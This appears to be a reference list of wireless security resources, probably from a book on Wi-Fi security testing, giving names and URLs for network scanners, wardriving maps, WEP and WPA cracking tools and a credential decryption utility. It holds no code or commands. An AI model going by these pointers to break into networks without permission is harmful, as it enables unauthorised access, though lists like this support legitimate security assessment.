Homebrew WiFi antenna
www.turnpoint.net/wireless/has.html

KisMAC
http://kismac.binaervarianz.de

Kismet
www.kismetwireless.net

Lucent Orinoco Registry Encryption/Decryption program
www.cqure.net/tools.jsp?id=3

NetStumbler
www.netstumbler.com

OmniPeek
www.wildpackets.com/products/omni/overview/omnipeek_analyzers

RFprotect Mobile
www.networkchemistry.com/products/rfprotectmobile.php

SeattleWireless HardwareComparison page
www.seattlewireless.net/index.cgi/HardwareComparison

Security of the WEP Algorithm
www.isaac.cs.berkeley.edu/isaac/wep-faq.html

The Unofficial 802.11 Security Web Page
www.drizzle.com/~aboba/IEEE

Wellenreiter
www.wellenreiter.net

WiGLE database of wireless networks at
www.wigle.net
www.wifimaps.com
www.wifinder.com

WinAirsnort
http://winairsnort.free.fr/

Wireless Vulnerabilities and Exploits
www.wirelessve.org

WPA Cracker
www.tinypeap.com/html/wpa_cracker.html